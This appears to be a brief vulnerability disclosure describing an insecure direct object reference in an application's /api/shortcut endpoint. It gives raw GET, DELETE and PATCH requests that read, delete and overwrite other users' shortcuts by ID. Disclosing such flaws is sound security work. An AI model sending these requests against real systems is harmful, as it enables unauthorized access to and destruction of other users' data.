Even if the endpoint /api/shortcut allow to see the list of your own shortcuts, it is possible to access, modify and delete other users shortcut accessing directly through the IDs.
Now you are able to access to the shortcut with this:
GET /api/shortcut/1 HTTP/1.1
Host: localhost:5230
You can also delete it:
DELETE /api/shortcut/1 HTTP/1.1
Host: localhost:5230
And update it
PATCH /api/shortcut/1 HTTP/1.1
Host: localhost:5230
{"id":1,"title":"changed 2","payload":"[]"}